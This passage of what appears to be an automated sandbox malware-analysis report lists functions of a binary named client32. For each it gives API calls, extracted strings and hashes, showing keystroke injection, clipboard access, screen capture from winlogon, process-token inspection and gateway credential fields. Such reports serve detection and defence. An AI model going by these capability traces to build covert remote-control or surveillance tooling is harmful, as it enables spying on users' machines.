                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 110C10E8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$BringCurrentIconicShowThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4184413098-0
                                                                                                                                                    • Opcode ID: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
                                                                                                                                                    • Instruction ID: 84533db14937db9444e2f7c69536c5845b28cc0232cb9748846df38ed0837754
                                                                                                                                                    • Opcode Fuzzy Hash: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
                                                                                                                                                    • Instruction Fuzzy Hash: 1731CD3AA00315DBDB14DE68D48079ABBA8AF48754F1540BAFC169F246CBB5E845CFE0
                                                                                                                                                    Function 11113190 Relevance: 3.1, APIs: 2, Instructions: 54keyboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DeviceIoControl.KERNEL32(?,00000101,?,00000001,00000000,00000000,?,00000000), ref: 111131E2
                                                                                                                                                    • keybd_event.USER32(00000091,00000046,00000000,00000000), ref: 11113215
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ControlDevicekeybd_event
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1421710848-0
                                                                                                                                                    • Opcode ID: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                                                                                                    • Instruction ID: d69eaa5760cfcdb7a6e8037c3782fd2f7db196db4b5aaba7e7bab0ff0a721f20
                                                                                                                                                    • Opcode Fuzzy Hash: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                                                                                                    • Instruction Fuzzy Hash: E4012432F55A1539F30489B99E45FE7FA2CAB40721F014278EE59AB2C8DAA09904C6A0
                                                                                                                                                    Function 110335A0 Relevance: 3.0, APIs: 2, Instructions: 49clipboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110335F6
                                                                                                                                                    • SetClipboardData.USER32(00000000,00000000), ref: 11033612
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Clipboard$DataFormatName
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3172747766-0
                                                                                                                                                    • Opcode ID: e17e0e6aed767a58da8d411b70808350d70cb6dd51a63046c179038dcd941cc4
                                                                                                                                                    • Instruction ID: d021e7b1abaf81fd48200924965e9797cc36530c630056afc83bc75e16402c3f
                                                                                                                                                    • Opcode Fuzzy Hash: e17e0e6aed767a58da8d411b70808350d70cb6dd51a63046c179038dcd941cc4
                                                                                                                                                    • Instruction Fuzzy Hash: 6701D830D2E124AEC714DF608C8097EB7ACEF8960BB018556FC419A380EF29A601D7F6
                                                                                                                                                    Function 1103D530 Relevance: 56.4, APIs: 14, Strings: 18, Instructions: 385libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$_memset$AddressFreeLoadProcwsprintf$_malloc
                                                                                                                                                    • String ID: %02x%02x%02x%02x%02x%02x$%d adapters in chain, %d adapters by size$* $3$CLTCONN.CPP$GetAdaptersInfo$IPHLPAPI.DLL$Info. Netbios macaddr=%s$Info. Set MacAddr to %s$Info. Unable to load netapi32$Info. macaddr[%d]=%s, ipaddr=%hs/%hs$ListenAddress$Netbios$TCPIP$VIRTNET$Warning. Netbios() returned x%x$netapi32.dll$pGetAdaptersInfo
                                                                                                                                                    • API String ID: 2942389153-3574733319
                                                                                                                                                    • Opcode ID: cf2d16c8c97f05e0515526d6f1a9da3da889a5d61ab08703c0b3442b7c36f74d
                                                                                                                                                    • Instruction ID: 9380186eaa86aba5e78307d08d1cef0eec38285017acdf678952b44c5cd5fdba
                                                                                                                                                    • Opcode Fuzzy Hash: cf2d16c8c97f05e0515526d6f1a9da3da889a5d61ab08703c0b3442b7c36f74d
                                                                                                                                                    • Instruction Fuzzy Hash: 60E13A75D1429A9FEB17CB648C90BEEBBF96F85305F4400D9E858B7240E630AB44CF61
                                                                                                                                                    Function 6CA8CDB0 Relevance: 52.7, APIs: 11, Strings: 19, Instructions: 247COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 6CA8CDF0
                                                                                                                                                    • EnterCriticalSection.KERNEL32(6CACB898,00000000,?), ref: 6CA8CE13
                                                                                                                                                    • InterlockedIncrement.KERNEL32(-6CACCB16), ref: 6CA8CE29
                                                                                                                                                    • InterlockedIncrement.KERNEL32(-6CACCB86), ref: 6CA8CE2F
                                                                                                                                                      • Part of subcall function 6CA97D00: __vswprintf.LIBCMT ref: 6CA97D26
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6CACB898), ref: 6CA8CE36
                                                                                                                                                    • _free.LIBCMT ref: 6CA8CF2C
                                                                                                                                                    • _free.LIBCMT ref: 6CA8CFD7
                                                                                                                                                      • Part of subcall function 6CAA1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6CAA1C13
                                                                                                                                                      • Part of subcall function 6CAA1BFD: GetLastError.KERNEL32(00000000), ref: 6CAA1C25
                                                                                                                                                    • _free.LIBCMT ref: 6CA8D029
                                                                                                                                                    • _free.LIBCMT ref: 6CA8D0CA
                                                                                                                                                    • _free.LIBCMT ref: 6CA8D109
                                                                                                                                                    • _free.LIBCMT ref: 6CA8D115
                                                                                                                                                      • Part of subcall function 6CA85060: _free.LIBCMT ref: 6CA8506A
                                                                                                                                                      • Part of subcall function 6CA85060: _malloc.LIBCMT ref: 6CA85090
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$CritiuserncrementInterlockedSection$EnterErrorFreeHeapLastLeave__vswprintf_malloc_memset
                                                                                                                                                    • String ID: APPTYPE=%d$CMD=CTL_BROWSE$CONTEXT=%s$CSPEC=%s$CTLTYPE=%d$GSK$GSK=%s$Gateway_Gsk$Gateway_Name$Gateway_Password$Gateway_Username$MATCH_NAME=%s$PWD=%s$REQHOSTNAME=1$REQUSERNAME=1$SERVICETYPE=CLASS$SERVICETYPE=DEPT$USER=%s$WANTSHELP=1
                                                                                                                                                    • API String ID: 2543302378-3410294771
                                                                                                                                                    • Opcode ID: 8c66819d9a99394b111bab407e7a735a7f35679957059c24d5457507308f3a0b
                                                                                                                                                    • Instruction ID: 272d45ebfc2e38a7d9ce1362faabfaa524075c18b64d03bdfffca258a6bef862
                                                                                                                                                    • Opcode Fuzzy Hash: 8c66819d9a99394b111bab407e7a735a7f35679957059c24d5457507308f3a0b
                                                                                                                                                    • Instruction Fuzzy Hash: DA9156B2D0021AABDB21DB94CD41FFE77B8AF44208F044599A509B7A41E7309ACCCFB5
                                                                                                                                                    Function 110B3100 Relevance: 50.9, APIs: 23, Strings: 6, Instructions: 178filewindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OpenEventA.KERNEL32(00100000,00000000,Client32DIBQuit), ref: 110B3130
                                                                                                                                                    • OpenEventA.KERNEL32(00100000,00000000,Client32DIBBlit), ref: 110B3141
                                                                                                                                                    • OpenEventA.KERNEL32(00000002,00000000,Client32DIBDone), ref: 110B314F
                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FA), ref: 110B3183
                                                                                                                                                    • OpenFileMappingA.KERNEL32(000F001F,00000000,Client32DIB), ref: 110B31A6
                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 110B31C2
                                                                                                                                                    • GetDC.USER32(00000000), ref: 110B31E8
                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 110B31FC
                                                                                                                                                    • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 110B321F
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 110B3236
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 110B323F
                                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110B3276
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 110B327F
                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 110B328E
                                                                                                                                                    • GdiFlush.GDI32 ref: 110B32A2
                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 110B32AD
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 110B32B4
                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 110B32BE
                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 110B32C8
                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 110B32D4
                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 110B32DE
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 110B32E5
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 110B3309
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EventOpen$FileObject$CloseCountCreateDeleteHandleSelectTickView$CompatibleErrorFlushLastMappingMultipleObjectsReleaseSectionUnmapWait
                                                                                                                                                    • String ID: Client32DIB$Client32DIBBlit$Client32DIBDone$Client32DIBQuit$ERROR %d blitting from winlogon, took %d ms$ScrapeApp
                                                                                                                                                    • API String ID: 2071925733-2101319552
                                                                                                                                                    • Opcode ID: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
                                                                                                                                                    • Instruction ID: 4116a02b123aa608432531ba698621a05075ff29bb652617cbc71955754d1d1a
                                                                                                                                                    • Opcode Fuzzy Hash: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
                                                                                                                                                    • Instruction Fuzzy Hash: A9518679E40229ABDB14CFE4CD89F9EBBB4FB48704F104064F921AB644D774A900CB65
                                                                                                                                                    Function 11005410 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 214windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1105E950: __itow.LIBCMT ref: 1105E975
                                                                                                                                                    • GetObjectA.GDI32(?,0000003C,?), ref: 110054E5
                                                                                                                                                      • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                                                                                      • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                                                                                    • wsprintfA.USER32 ref: 1100553D
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 11005592
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1100559B
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 110055B2
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 110055B8
                                                                                                                                                    • DeleteDC.GDI32(?), ref: 110055BE
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 110055CF
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 110055D8
                                                                                                                                                    • DeleteDC.GDI32(?), ref: 110055DE
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 110055EF
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1100561A
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 11005638
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 11005641
                                                                                                                                                    • ShowWindow.USER32(?,00000009), ref: 1100566F
                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 11005677
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
                                                                                                                                                    • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                                                                                                    • API String ID: 2789700732-770455996
                                                                                                                                                    • Opcode ID: fa30a8fc88e828b2b41ce521f9f081a77df99f407f500f9b6b47d79f574b6951
                                                                                                                                                    • Instruction ID: fd76b8300a222304a99732cac27ba94327f80de35dfbaf81c148901aa75ffadf
                                                                                                                                                    • Opcode Fuzzy Hash: fa30a8fc88e828b2b41ce521f9f081a77df99f407f500f9b6b47d79f574b6951
                                                                                                                                                    • Instruction Fuzzy Hash: 24813775600609AFD368DBA5CD91EABF7F9BF8C704F00494DE5AAA7241CA74F801CB60
                                                                                                                                                    Function 11107050 Relevance: 40.6, APIs: 16, Strings: 7, Instructions: 304libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll,1EF76653,00000002,11030250,?,00000000,1118A896,000000FF,?,1110809F,00000000,?,11030250,00000000,00000000), ref: 1110708D
                                                                                                                                                      • Part of subcall function 11138260: GetVersion.KERNEL32(00000000,75730BD0,00000000), ref: 11138283
                                                                                                                                                      • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 111382A4
                                                                                                                                                      • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 111382B4
                                                                                                                                                      • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111382D1
                                                                                                                                                      • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111382DD
                                                                                                                                                      • Part of subcall function 11138260: _memset.LIBCMT ref: 111382F7
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 111070DF
                                                                                                                                                    • LoadLibraryA.KERNEL32(Kernel32.dll,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 11107116
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 111071A0
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 111071F1
                                                                                                                                                    • GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 1110726A
                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,1110809F), ref: 1110728C
                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072A3
                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072B0
                                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1110809F), ref: 111072D0
                                                                                                                                                      • Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                                                                                                      • Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                                                                                      • Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,00000104,?,1110809F), ref: 11107446
                                                                                                                                                      • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,00000000,?,00000104,?,1110809F), ref: 11107360
                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,00000000,?,00000104,?,1110809F), ref: 1110738F
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00000000,?,00000104,?,1110809F), ref: 1110743F
                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,1110809F), ref: 111074CC
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,1110809F), ref: 111074D3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
